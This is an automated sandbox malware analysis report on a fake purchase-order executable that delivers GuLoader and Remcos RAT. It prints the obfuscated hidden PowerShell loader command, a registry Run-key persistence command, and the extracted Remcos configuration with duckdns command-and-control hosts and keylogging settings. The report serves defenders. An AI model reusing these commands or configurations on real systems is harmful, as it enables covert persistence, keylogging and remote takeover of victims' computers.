Edit tour

Windows Analysis Report
PO-USC-22USC-KonchoCo.exe

Overview

General Information

Sample name:	PO-USC-22USC-KonchoCo.exe
Analysis ID:	1435466
MD5:	cbfe477536e5434005ec40a22c8b79ee
SHA1:	2fb42b99bb51041bbbe2da96125aeb95ec1b4c02
SHA256:	88079d533879c31b99a435c152016333280e0290b80f8f3afbb28f2ccbc4b246
Tags:	exe
Infos:

Detection

GuLoader, Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Found suspicious powershell code related to unpacking or dynamic code loading

Installs a global keyboard hook

Obfuscated command line found

Powershell drops PE file

Sample uses process hollowing technique

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious powershell command line found

Uses dynamic DNS services

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Potential Dosfuscation Activity

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sleep loop found (likely to delay execution)

Too many similar processes found

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

PO-USC-22USC-KonchoCo.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe" MD5: CBFE477536E5434005EC40A22C8B79EE)

powershell.exe (PID: 7764 cmdline: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7908 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

wab.exe (PID: 7188 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

cmd.exe (PID: 4940 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2792 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

wab.exe (PID: 3872 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 2024 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 2112 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 5368 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 2032 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 2324 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 4812 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 2148 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 3128 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 4624 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 2920 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 3524 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 3344 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 3588 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 5292 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 5268 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 1808 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 2332 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 8092 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 5168 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 3888 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 5196 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 2816 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 1664 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 3604 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 5820 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 2756 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 2932 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 5796 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 3940 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 1344 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 1856 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

wab.exe (PID: 2656 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "learfo55ozj02.duckdns.org:29871:0learfo55ozj02.duckdns.org:29872:1leirfo45ozj01.duckdns.org:29871:0", "Assigned name": "Tops", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "jmofvnb-6GMGJI", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "fvberms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\fvberms.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000001.00000002.3490629462.000000000C710000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: wab.exe PID: 7188	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7188, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", ProcessId: 4940, ProcessName: cmd.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 2792, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Insecta

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4940, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", ProcessId: 2792, ProcessName: reg.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7764, TargetFilename: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe

Sigma detected: Potential Dosfuscation Activity

Source: Process started

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7764, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 7908, ProcessName: cmd.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7188, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)", ProcessId: 4940, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)", CommandLine: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe", ParentImage: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe, ParentProcessId: 7680, ParentProcessName: PO-USC-22USC-KonchoCo.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)", ProcessId: 7764, ProcessName: powershell.exe

Snort Signatures

ET TROJAN Remcos 3.x Unencrypted Server Response - Source IP: 193.222.96.21 - Destination IP: 192.168.2.4

Timestamp:	05/02/24-19:02:32.592137
SID:	2032777
Source Port:	29871
Destination Port:	49740
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Remcos 3.x Unencrypted Checkin - Source IP: 192.168.2.4 - Destination IP: 193.222.96.21

Timestamp:	05/02/24-19:02:02.070800
SID:	2032776
Source Port:	49740
Destination Port:	29871
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp	URL Reputation: Label: phishing
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware

Found malware configuration

Source: 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "learfo55ozj02.duckdns.org:29871:0learfo55ozj02.duckdns.org:29872:1leirfo45ozj01.duckdns.org:29871:0", "Assigned name": "Tops", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "jmofvnb-6GMGJI", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "fvberms.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes\PO-USC-22USC-KonchoCo.exe	Virustotal: Detection: 11%			Perma Link

Multi AV Scanner detection for submitted file

Source: PO-USC-22USC-KonchoCo.exe	ReversingLabs: Detection: 15%
Source: PO-USC-22USC-KonchoCo.exe	Virustotal: Detection: 11%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7188, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\fvberms.dat, type: DROPPED

Source: PO-USC-22USC-KonchoCo.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.45.139:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: PO-USC-22USC-KonchoCo.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.3487057946.0000000006FBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.3490237791.00000000080E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.3487057946.0000000006F7A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.3487057946.0000000006F7A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.3487057946.0000000006F7A000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Code function: 0_2_004069DF FindFirstFileW,FindClose,	0_2_004069DF
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Code function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D8E
Source: C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\brosy\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.4:49740 -> 193.222.96.21:29871
Source: Traffic	Snort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 193.222.96.21:29871 -> 192.168.2.4:49740

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: learfo55ozj02.duckdns.org

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 193.222.96.21 ports 29871,1,2,7,8,9

Uses dynamic DNS services

Source: unknown	DNS query: name: learfo55ozj02.duckdns.org
Source: unknown	DNS query: name: leirfo45ozj01.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.4:49740 -> 193.222.96.21:29871

Source: global traffic

